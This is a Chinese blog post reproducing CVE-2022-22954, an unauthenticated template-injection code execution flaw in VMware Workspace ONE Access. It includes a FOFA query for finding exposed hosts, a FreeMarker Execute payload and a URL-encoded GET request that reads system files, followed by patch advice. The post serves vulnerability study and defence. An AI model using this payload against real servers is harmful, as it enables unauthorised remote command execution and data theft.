VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)

最新推荐文章于 2025-03-19 19:28:32 发布
最新推荐文章于 2025-03-19 19:28:32 发布
阅读量1.5k 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124815378
版权

一、漏洞描述

VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。

二、影响版本

三、漏洞环境

fofa:icon_hash="-1250474341"

四、漏洞复现

poc:

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d

返回状态为200,且包涵Authorization context is not valid

五、更新建议

1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

VMSA-2022-0011

2、使用安全版本

参考文献:CVE-2022-22954 : VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side templa

 

whatever`
关注
BGP协议详解
qq_62189139的博客
11-22 3121
边界网关协议BGP(Border Gateway Protocol)是一种实现自治系统AS(Autonomous System)之间的路由可达,并选择最佳路由的距离矢量路由协议
BGP协议详解及工作原理
empty_csx的博客
08-01 5679
边界网关协议BGP) 是运行于 TCP 上的一种自治系统的路由协议BGP 是唯一一个用来处理像因特网大小的网络协议,也是唯一能够妥善处理好不相关路由域间的多路连接的协议BGP的特征 传输协议tcp 端口号179 BGP是外部路由协议,用来在AS之间传递数据 是一种增强的路径矢量路由协议 拥有可靠的路由更新机制 无路由环路设计 为路由条目覆带属性思想 支持CIDR(五类别域间路由) 丰富的路由过度和路由策略 无需周期性更新 路由更新时发送增量路由 周期性发送KeepAlive报文以保持TCP直通
BGP路由协议详解
12-09
BGP协议的内容也不算太难,一些关于BGP的高级应用,会在以后MPLS 协议和MPLS流量工程中的内容中会更深入的讲解!
BGP路由协议网络协议详解】--通俗易懂!
最新发布
2403_83112422的博客
03-19 1352
BGP路由协议的详细讲解--通俗易懂
bgp 协议 详解
weixin_34293902的博客
11-02 209
BGP是可靠的,基于TCP(Port Numer 179)进行建立和维护连接,并且具有并使用TCP的滑动窗口的机制来更新路由表,可以支持一次性的大量路由条目的更新. BGP是增量更新,同时也是触发更新;周期性的发送Keepalive信息来验证TCP连接是否正常,以确保对方的路由器状态是正常的。 PS:EIGRP(使用IPV4协议号89)和OSPF-V...
BGP路由协议详解(完整篇).pdf
08-20
BGP路由协议详解(完整篇)。进阶网络工程师的必选教程。。
BGP路由协议详解完整篇
weixin_34414196的博客
03-01 688
BGP路由协议详解完整篇) 注:本文出自 “张选波博客” 博客,务必保留此出处http://xuanbo.blog.51cto.com/499334/194664本文出自 51CTO.COM技术博客 转载于:https://blog.51cto.com/235898457/279352...
BGP(边界网关协议详解
qq_64302290的博客
03-30 6396
OutQ:队列,一般情况下该值为0,如果持续性不为0,那么该网络就说明出现了大问题。PrefRce:表示通过这个邻居学习到了几条路由。
网络协议详解】——BGP协议(学习笔记)
HinsCoder的博客
06-08 1万+
BGP(Border Gateway Protocol),边界网关协议。一种自治系统间的选路协议,在 AS 之间交换网络的可达性信息。根据可达性信息,路由器能够构造 AS 之间的连接关系图,从而计算出到达目的网络的路由。在计算路由时,管理员可以在 AS 层面上应用一些路由控制策略。例如,控制到某网络的路由不经过某些 AS。因此,BGP尽力寻找一条能够到达目的网络且比较好的路由(不兜圈子),而并非找最佳路由。BGP属于距离矢量路由算法的增强协议,在原有路由信息的基础上加入路径信息,防止了。
网络协议——BGP(边界网关协议)全网最详解
热门推荐
wh940830165的博客
04-15 2万+
AS: 指的是在同一个组织管理下,使用统一选路策略的设备集合,AS取值范围四字节( 0~43亿。
BGP协议
obboda的博客
10-04 1048
BGP(Border Gateway Protocol,边界网关协议)是一种用于自治系统(AS)之间交换路由信息的EGP类别动态路由协议BGP协议为不同AS间共享路由,工作时隔离两个AS的内部网络,形成一个独立的交互间,且同时可以实施强大的策略来干涉选路。(1)AS——自治系统标准AS号长度为16位,范围:0-65535公有:1-64511私有:64512 -65535扩展AS号长度为32位,范围:约42亿。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值